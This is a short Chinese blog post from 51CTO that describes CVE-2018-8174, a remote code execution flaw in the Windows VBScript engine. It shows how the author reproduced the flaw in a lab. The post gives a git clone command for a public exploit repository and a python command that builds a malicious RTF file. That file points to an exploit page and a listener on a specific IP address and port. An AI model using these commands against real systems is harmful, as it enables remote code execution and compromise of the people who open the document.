CVE-2018-8174

原创

willianir 2021-10-23 11:49:28 ©著作权

©著作权归作者所有：来自51CTO博客作者willianir的原创作品，请联系作者获取转载授权，否则将追究法律责任

漏洞描述：

CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞。

微软在4月20日早上确认此漏洞，并于5月8号发布了官方安全补丁，对该 0day 漏洞进行了修复，将其命名为 CVE-2018-8174

由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞，攻击者可以将恶意的VBScript嵌入到Office文件或者网站中，一旦用户不小心点击，远程攻击者可以获取当前用户权限执行脚本中的恶意代码

操作

CVE-2018-8174_python

CVE-2018-8174_web_02

CVE-2018-8174_git_03

这里是先创建的CVE文件

克隆的命令：git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

python CVE-2018-8174.py -u http://47.103.97.200/exploit.html -o msf.rtf -i 47.103.97.200 -p 19132

CVE-2018-8174_python_04

CVE-2018-8174_git_05

CVE-2018-8174_执行引擎_06

CVE-2018-8174_web_07

CVE-2018-8174_执行引擎_08

CVE-2018-8174_git_09

下一篇：BUUCTF (1)

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯